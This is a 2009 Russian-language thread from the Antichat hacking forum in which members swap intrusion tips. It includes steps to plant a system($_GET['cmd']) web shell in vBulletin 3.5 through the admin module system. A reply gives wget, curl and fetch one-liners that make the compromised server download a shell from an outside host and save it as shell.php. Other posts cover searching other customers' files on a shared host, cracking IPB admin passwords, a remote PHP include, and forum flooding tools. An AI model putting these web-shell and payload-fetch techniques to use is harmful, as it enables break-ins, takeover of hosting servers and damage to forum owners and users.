ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 15.03.2009, 16:51
Аватар для kile2005
kile2005
Новичок
Регистрация: 04.03.2009
Сообщений: 2
Провел на форуме:
22224

Репутация: 0
По умолчанию

Цитата:
Был удивлён, что про это ещё не писали.. Т.е. я ща спалю приват-фишку =) Идём на фрихост, смело регимся там, заливаем шелл на фтп. Ищем по всем ресурсам файлы с расширением ......
Источник: www.antichat.ru
Не подскажите где поподробней прочитать про этот метод поиска файлов на хосте?

я зарегился на фрихосте,залил шелл к себе на хост,запускаю в нем поиск, как описано выше, ищет только у меня на ресурсе. Как сделать поиск определенного файла по всем ресурсам хоста? Что я делаю не так?
P.S.у файлов которые нужно найти права доступа 777 или 755 и они точно находятся гдето на том же хосте где и мой ресурс,
 
Ответить с цитированием

  #2  
Старый 14.03.2009, 12:48
Аватар для inc
inc
Новичок
Регистрация: 13.03.2009
Сообщений: 23
Провел на форуме:
66989

Репутация: 5
По умолчанию

ну новый часто не выполняется,прав чтоли не хватает,а если заменить то все ок
 
Ответить с цитированием

  #3  
Старый 16.03.2009, 20:49
Аватар для missy
missy
Новичок
Регистрация: 15.03.2009
Сообщений: 1
Провел на форуме:
20675

Репутация: 0
По умолчанию

извините , если этот вопрос уже когда то задавали...

Сколько времени уходит у знающего человека (мастера) на вскрытие пароля админа на старых форумах IPB ,форумах без всяких там особенных защит и серьезных людей ?
 
Ответить с цитированием

  #4  
Старый 17.03.2009, 13:11
Аватар для GrinGoO
GrinGoO
Участник форума
Регистрация: 01.07.2008
Сообщений: 172
Провел на форуме:
2567583

Репутация: 258
Отправить сообщение для GrinGoO с помощью ICQ
По умолчанию

Цитата:
извините , если этот вопрос уже когда то задавали...

Сколько времени уходит у знающего человека (мастера) на вскрытие пароля админа на старых форумах IPB ,форумах без всяких там особенных защит и серьезных людей ?

Времени по разному может уходить. Никогда нельзя сказать точно. Смотря какой форум, какие там есть известные баги и сматря какое умственное развитие у руководства форума
 
Ответить с цитированием

  #5  
Старый 02.04.2009, 04:07
Аватар для superalex
superalex
Новичок
Регистрация: 01.04.2009
Сообщений: 1
Провел на форуме:
11623

Репутация: 0
По умолчанию

Здравствуйте !!!
Какой на данный момент какой самый безопасный форум ? не важно платный либо бесплатный , желательно также с авто обновлением !!!
что думаете о ipb последней версии?

Последний раз редактировалось superalex; 02.04.2009 в 04:27..
 
Ответить с цитированием

  #6  
Старый 02.04.2009, 09:48
Аватар для dyx
dyx
Познающий
Регистрация: 05.04.2005
Сообщений: 46
Провел на форуме:
77505

Репутация: 1
По умолчанию

Цитата:
Способ заливки шелла в vBulletin 3.5.*.
1. Заходим в админку.
2. Система модулей.
3. Добавить новый модуль.
Продукт: ставим vBulletin
Месторасположение: Vbulletin: Справка - faq_complete
Вставляем в тело код нашего шелла (шелл не должен превышать 60кб), проще сделать system($_GET["cmd"]);
4. Сохраняем, идём в faq (справка), всё теперь у нас есть шелл. Если он был такой system($_GET["cmd"]); делаем так www.xz.сom/forumpath/faq.php?cmd=тут команда

Как через этот шел залить файл на сервер???
 
Ответить с цитированием

  #7  
Старый 02.04.2009, 09:54
Аватар для laedafess
laedafess
Познающий
Регистрация: 11.02.2009
Сообщений: 98
Провел на форуме:
1446969

Репутация: 169
По умолчанию

Код:
www.xz.сom/forumpath/faq.php?cmd=wget http://site.com/shell.txt -O shell.php
or
Код:
www.xz.сom/forumpath/faq.php?cmd=curl http://site.com/shell.txt > shell.php
or
Код:
www.xz.сom/forumpath/faq.php?cmd=fetch http://site.com/shell.txt -o shell.php
 
Ответить с цитированием

  #8  
Старый 03.04.2009, 08:00
Аватар для dyx
dyx
Познающий
Регистрация: 05.04.2005
Сообщений: 46
Провел на форуме:
77505

Репутация: 1
По умолчанию

Цитата:
Сообщение от laedafess  
Код:
www.xz.сom/forumpath/faq.php?cmd=wget http://site.com/shell.txt -O shell.php
or
Код:
www.xz.сom/forumpath/faq.php?cmd=curl http://site.com/shell.txt > shell.php
or
Код:
www.xz.сom/forumpath/faq.php?cmd=fetch http://site.com/shell.txt -o shell.php

Косяк...

Файл создается на сервере, но пустой, как туда код то запихнуть???

и еще

на сервере включен
allow_url_fopen On On

если это вставить
<? include('http://путь_к_шеллу_.php') ?>

что будет??? как вызвать сам шелл

Последний раз редактировалось dyx; 03.04.2009 в 08:07..
 
Ответить с цитированием

  #9  
Старый 04.04.2009, 15:44
Аватар для Ecu
Ecu
Новичок
Регистрация: 28.03.2009
Сообщений: 1
Провел на форуме:
5420

Репутация: 0
По умолчанию

Приветствую всех, есть флудер для форумов Вблювотень ?
Есть один форумчик без лимита по времени для отправки мессаг.
Нужно немного пофлудить)
 
Ответить с цитированием

  #10  
Старый 04.04.2009, 16:04
Аватар для -m0rgan-
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Халявных ниразу не видил, только комерческие...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ *NIX ] Задай вопрос - получи ответ. Xszz *nix 1547 15.06.2010 15:41
ЕсТь ВоПрос Guma Чаты 4 26.10.2005 21:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ